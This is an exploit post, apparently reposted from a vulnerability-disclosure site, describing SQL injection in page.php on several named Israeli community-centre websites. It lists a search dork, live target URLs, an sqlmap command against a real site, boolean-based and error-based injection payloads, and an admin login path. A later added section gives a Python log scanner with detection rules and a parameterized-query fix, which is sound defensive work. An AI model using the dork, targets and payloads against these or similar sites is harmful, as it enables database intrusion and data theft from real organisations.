Bugs Exploit Israel SQL Injection Vulnerability Tested on BackBox Linux


Exploit Information

[+] Exploit Title: Israel SQL Injection Vulnerability
[+] Author : Cxsecurity.com and Nobody (TR)
[+] Dork : inurl:’’page.php?type=activity id=1’’
[+] Tested on : BackBox 5.1, Chrome

On Target :
- http://www.ramotalon.org.il/page.php?type=activity&id=1%27&ht=%D7%A4%D7%A2%D7%99%D7%9C%D7%95%D7%AA%20%D7%94%D7%92%D7%99%D7%9C%20%D7%94%D7%A8%D7%9A%20(0-5)
- http://www.matnas-am.org.il/page.php?type=activity&id=1%27&ht=%D7%A4%D7%A2%D7%99%D7%9C%D7%95%D7%AA%20%D7%94%D7%92%D7%99%D7%9C%20%D7%94%D7%A8%D7%9A%20(0-5)
- http://www.ganim.org.il/page.php?type=activity&id=1%27&ht=%D7%A4%D7%A2%D7%99%D7%9C%D7%95%D7%AA%20%D7%94%D7%92%D7%99%D7%9C%20%D7%94%D7%A8%D7%9A%20(0-5)
- https://www.rktnz.org.il/page.php?type=activity&id=1%27&ht=%D7%A4%D7%A2%D7%99%D7%9C%D7%95%D7%AA%20%D7%94%D7%92%D7%99%D7%9C%20%D7%94%D7%A8%D7%9A%20(0-5)

[+] sqlmap PoC :
$ sqlmap -u "http://www.matnas-am.org.il/page.php?type=activity&id=1" --dbs

[+] PoC SQL Injection :
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: type=activity&id=1 AND 4637=4637

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: type=activity&id=1 AND (SELECT 4984 FROM(SELECT COUNT(*),CONCAT(0x716a6b7a71,(SELECT (ELT(4984=4984,1))),0x7171707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

[+] PoC local admin :
/login.php

Bug exploit source : [https://cxsecurity.com/issue/WLB-2018050138]
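
Seen from the defender's side, the quote probe in the listed URLs and the two payload types in the sqlmap output leave recognizable traces in web-server access logs. The following is an added example, not part of the original advisory: it scans log lines for non-numeric values in the `id` parameter of `page.php`. The log format, client addresses and rule names are assumptions, and the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from any real server).
SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2018:10:00:01 +0000] "GET /page.php?type=activity&id=1 HTTP/1.1" 200 5120
203.0.113.9 - - [10/May/2018:10:00:07 +0000] "GET /page.php?type=activity&id=1%27 HTTP/1.1" 200 312
203.0.113.9 - - [10/May/2018:10:00:09 +0000] "GET /page.php?type=activity&id=1%20AND%204637%3D4637 HTTP/1.1" 200 5120
203.0.113.9 - - [10/May/2018:10:00:12 +0000] "GET /page.php?type=activity&id=1+AND+(SELECT+4984+FROM(SELECT+COUNT(*),CONCAT(0x71,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x)a) HTTP/1.1" 200 640
198.51.100.2 - - [10/May/2018:10:01:00 +0000] "GET /page.php?type=activity&id=27 HTTP/1.1" 200 4988
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Rules mirror the two sqlmap payload types quoted above, plus the %27 probe.
RULES = [
    ("error-based (FLOOR/RAND)", re.compile(r"floor\s*\(\s*rand\s*\(.*group\s+by", re.I | re.S)),
    ("boolean-based blind", re.compile(r"\b(?:and|or)\s+(\d+)\s*=\s*\1\b", re.I)),
    ("quote probe", re.compile(r"['\"]")),
]

def classify_id(value):
    """Return None for a plain integer id, else the name of the matching rule."""
    if re.fullmatch(r"[0-9]+", value):
        return None
    for name, pattern in RULES:
        if pattern.search(value):
            return name
    return "non-numeric id"

def scan(log_text, path="/page.php", param="id"):
    """Return (client, verdict, decoded value) for each suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if url.path != path:
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            verdict = classify_id(value)
            if verdict:
                findings.append((client, verdict, value))
    return findings

if __name__ == "__main__":
    for client, verdict, value in scan(SAMPLE_LOG):
        print(f"{client}\t{verdict}\t{value}")
```

Every legitimate `id` value shown on the page is a plain integer, so any non-numeric value in that parameter is worth reviewing. On the application side, the fix is to cast `id` to an integer and pass it to the database through a parameterized query.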

Good luck, and hopefully this is useful.